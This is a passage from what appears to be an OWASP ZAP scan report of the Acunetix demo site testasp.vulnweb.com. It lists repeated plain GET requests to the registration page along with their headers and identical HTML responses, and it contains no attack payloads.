id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td 